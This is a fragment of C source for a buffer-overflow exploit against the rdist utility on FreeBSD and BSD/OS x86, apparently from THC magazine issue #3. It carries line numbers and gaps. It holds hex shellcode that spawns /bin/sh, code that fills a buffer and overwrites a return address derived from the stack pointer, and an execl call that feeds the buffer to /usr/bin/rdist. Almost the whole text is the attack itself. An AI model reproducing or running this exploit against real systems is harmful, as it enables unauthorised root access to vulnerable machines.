2 * rdist exploit for freebsd & bsd/os x86 2.0
3 * discovered by brian mitchell
4 * coded by plasmoid/thc/deep for thc-magazine issue #3
11 #define offset 30+lv_size+8*4
15 __asm__("movl %esp, %eax");
19 main(int argc, char **argv)
22 "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
23 "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
24 "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
25 "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
27 char buffer[lv_size + 4 * 8];
28 unsigned long *ptr2 = NULL;
32 for (i = 0; i < lv_size + 4 * 8; i++)
36 for (i = 0; i < lv_size - strlen(execshell); i++)
39 for (i = 0; i < strlen(execshell); i++)
40 *(ptr++) = execshell[i];
43 for (i = 1; i < 2; i++)
44 *(ptr2++) = get_sp() + offset;
46 printf("discovered by brian mitchell\n"
47 "coded by plasmoid/thc/deep\n" "for thc-magazine issue #3\n");
49 execl("/usr/bin/rdist", "rdist", "-d", buffer, "-d", buffer, NULL);